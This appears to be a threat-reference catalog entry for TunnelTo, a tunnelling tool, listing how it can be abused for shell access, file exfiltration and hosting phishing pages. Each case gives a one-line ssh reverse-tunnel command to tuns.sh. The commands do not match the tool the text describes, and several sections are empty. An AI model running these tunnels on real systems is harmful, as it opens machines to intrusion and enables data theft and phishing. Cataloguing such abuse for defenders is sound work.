.. /TunnelTo
Star

Install
Shell Access
Download
Exfiltration
Phishing

TunnelTo is free/subscription based tool which enables local services/applications to be exposed over the internet. Insiders as well as threat actors can use this tool to perform variety of malicious tasks. Although, the tool requires an authentication token of which free token can be obtained from the website.

Paths:

Resources:

Acknowledgements:

Detections:

Install

  1. In order to install the TunnelTo, it can be done directly via cargo, brew etc. as well as downloadable binaries are provided that can be executed on the fly.

    tunnelto set-auth --key <AUTH KEY>
    Use case
    Installing/Downloading the tunnelto binaries to be executed on the local machine.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Shell Access

  1. Exeuting the binary to generate a local tunnel by binding it to the local service running on TCP ports.

    ssh -R 2222:localhost:22 tuns.sh
    Use case
    Exposing SSH/RDP etc over tunnels for shell-access
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Download

  1. Executing the binary to generate a local tunnel by binding it to a local web server running on port 80.

    ssh -R 80:localhost:8080 tuns.sh
    Use case
    Exposing the local system over the tunnels for the files to be exfiltrated out of the organization.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Exfiltration

  1. Executing the binary to generate a local tunnel by binding it to the local file system exposed over port 80.

    ssh -R 80:localhost:8080 tuns.sh
    Use case
    Exposing the local web server/file system over the tunnels for the files to be exfiltrated out of the organization.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Phishing

  1. Executing the binary to generate a local tunnel by binding it to the local web server hosting phishing sites.

    ssh -R 80:localhost:8080 tuns.sh
    Use case
    Exposing the local web server hosting phishing sites to target users.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux